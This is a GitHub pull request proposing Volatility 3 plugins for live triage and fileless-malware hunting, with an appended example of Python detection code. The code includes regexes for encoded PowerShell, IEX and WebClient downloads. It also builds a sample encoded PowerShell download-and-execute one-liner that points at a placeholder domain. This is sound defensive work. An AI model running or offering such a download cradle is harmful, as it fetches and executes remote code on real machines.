Fileless Malware Hunter Volatility3 Plugin #1905
Open: malfav wants to merge 4 commits into volatilityfoundation:develop from malfav:filessmalwarehunter-plugin
Conversation
# live.py – Volatility 3 Live System Analysis Plugin

`live.py` is a custom plugin for **Volatility 3** designed to extend its capabilities for **real-time forensic data collection and threat hunting** directly on a **live Windows system**, eliminating the need for a full memory dump. This tool provides an **interactive command-line shell** for dynamic investigation, leveraging system APIs through libraries like `psutil` and `pywin32` to quickly triage and analyze active endpoints.

---

## Key Capabilities

### **Live Analysis Mode**

Performs immediate, low-overhead forensic data collection from an active operating system, bypassing traditional memory dump requirements.

### **Interactive Shell**

Includes an integrated CLI environment offering a suite of commands for efficient, step-by-step investigation via the `LiveShellCommand` interface.

### **Advanced Threat Hunting**

Provides built-in commands for targeted analysis:

- **fileless** – Detects fileless malware and suspicious in-memory activity, focusing on processes such as `powershell.exe`.
- **detect_sandbox** – Identifies virtualized or sandboxed environments by inspecting artifacts, process behavior, and MAC address prefixes.

### **Comprehensive Forensic Data Collection**

Collects essential artifacts and system information for deep analysis:

- **Process and Module Data:** `pslist`, `psscan`, `dlllist`, `handles`, `sids`, `cmdline`
- **Network Activity:** `netscan` for active connections and sockets
- **Persistence & Services:** Analysis of `services`, `drivers`, `registry`, and autorun entries
- **Artifact Analysis:** Extraction of `shimcache`, `prefetch`, `userassist`, and `jumplists`
- **Timeline Generation:** Unified event correlation using `timeliner`

---

# fileless.py – Advanced Fileless Malware Hunter (Volatility 3 Plugin)

`fileless.py` is a dedicated **Volatility 3 plugin** built for advanced forensic analysis of **Windows memory dumps**. Its primary focus is detecting and reporting threats related to **fileless malware**, **in-memory injection**, and other stealthy attack techniques that evade traditional disk-based antivirus detection.

---

## Key Capabilities

### **Fileless Threat Detection**

Scans memory artifacts to uncover indicators of fileless attacks, including:

- Reflective DLL loading and process injection
- In-memory PowerShell and script-based payloads
- Heavily obfuscated or encoded commands

### **Enhanced PowerShell Analysis**

Employs a comprehensive set of regular expressions (`POWERSHELL_PATTERNS`) to detect malicious PowerShell behavior, such as:

- Use of `-encodedcommand` with high-entropy or base64-encoded strings
- Invocation of `Invoke-Expression (IEX)` for dynamic code execution
- Network payload retrieval via `.Net.WebClient` or `DownloadString` calls

### **In-Memory Artifact Scanning**

Leverages Volatility 3's core analysis modules (`pslist`, `vadinfo`, `handles`) to identify suspicious or anomalous memory regions:

- Detection of **memory hollowing** and **unsigned code injection**
- Correlation of **Virtual Address Descriptors (VADs)** with process metadata
- Identification of mismatched or hidden modules

### **Structured Forensic Reporting**

Automatically generates a detailed **TreeGrid-style report** that presents findings in a structured and analyst-friendly format for triage and incident response.

---

## Reporting and Triage

The plugin provides automated scoring and classification of detected threats to accelerate analysis:

| **Report Column** | **Description** |
|--------------------|-----------------|
| **Detection Type** | Category of the threat (e.g., PowerShell Encoded Command, Suspicious Memory Region) |
| **Severity** | Risk rating to prioritize analysis (Critical, High, Medium) |
| **MITRE ATT&CK** | Maps identified behaviors to MITRE ATT&CK techniques for adversary tracking and intelligence correlation |
| **Indicator** | The exact pattern, command, or string that triggered the detection (e.g., base64-encoded command string) |

---
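As an added example (not code from the pull request or the Volatility project), here is a sketch of the detection logic the description outlines: regexes in the style of `POWERSHELL_PATTERNS`, a Shannon-entropy check plus UTF-16LE base64 decoding for `-EncodedCommand`, a rescan of the decoded script, and output shaped like the report columns above. The pattern names, severities and ATT&CK mapping are this example's own assumptions, and the sample command line is constructed.

```python
import base64
import math
import re
# Regexes in the spirit of the plugin's POWERSHELL_PATTERNS; names, severities
# and ATT&CK mapping are this example's own assumptions, not the plugin's.
POWERSHELL_PATTERNS = {
    "PowerShell Encoded Command": (re.compile(
        r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{20,})", re.I), "Critical", "T1059.001 / T1027"),
    "Invoke-Expression Usage": (re.compile(r"\b(?:invoke-expression|iex)\b", re.I), "High", "T1059.001"),
    "Network Payload Retrieval": (re.compile(r"net\.webclient|downloadstring|downloadfile", re.I), "High", "T1105"),
}
def shannon_entropy(data: str) -> float:
    """Bits per character; a run of one repeated character scores 0."""
    if not data:
        return 0.0
    probs = [data.count(c) / len(data) for c in set(data)]
    return -sum(p * math.log2(p) for p in probs)

def decode_encoded_command(blob: str):
    """-EncodedCommand carries base64 of UTF-16LE; return printable text or None."""
    try:
        text = base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None
    return text if text.isprintable() else None

def hunt_cmdline(pid: int, cmdline: str, entropy_floor: float = 3.5) -> list:
    """Report rows (Detection Type, Severity, MITRE ATT&CK, Indicator) for one process."""
    rows = []
    for dtype, (pattern, severity, technique) in POWERSHELL_PATTERNS.items():
        m = pattern.search(cmdline)
        if not m:
            continue
        indicator = m.group(1) if m.groups() else m.group(0)
        rows.append({"PID": pid, "Detection Type": dtype, "Severity": severity,
                     "MITRE ATT&CK": technique, "Indicator": indicator[:60]})
        if dtype == "PowerShell Encoded Command":
            decoded = decode_encoded_command(indicator)
            if decoded is None and shannon_entropy(indicator) < entropy_floor:
                rows.pop()  # neither decodable nor high-entropy: not a real payload
            elif decoded:  # rescan the decoded script so nested IEX/WebClient is caught
                rows += [r for r in hunt_cmdline(pid, decoded, entropy_floor)
                         if r["Detection Type"] != dtype]
    return rows

# Constructed sample: an encoded one-liner pointing at a reserved, non-routable test domain.
SAMPLE_SCRIPT = 'IEX (New-Object Net.WebClient).DownloadString("http://example.invalid/a.ps1")'
SAMPLE_BLOB = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode()
SAMPLE_CMDLINE = f"powershell.exe -nop -w hidden -enc {SAMPLE_BLOB}"
```

Running `hunt_cmdline(1234, SAMPLE_CMDLINE)` yields three rows: the encoded command itself, then the `IEX` and `Net.WebClient` hits found only after decoding.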
Contributor
this screams AI and also the plugin is basically malfind with additional basic YARA malware families .-.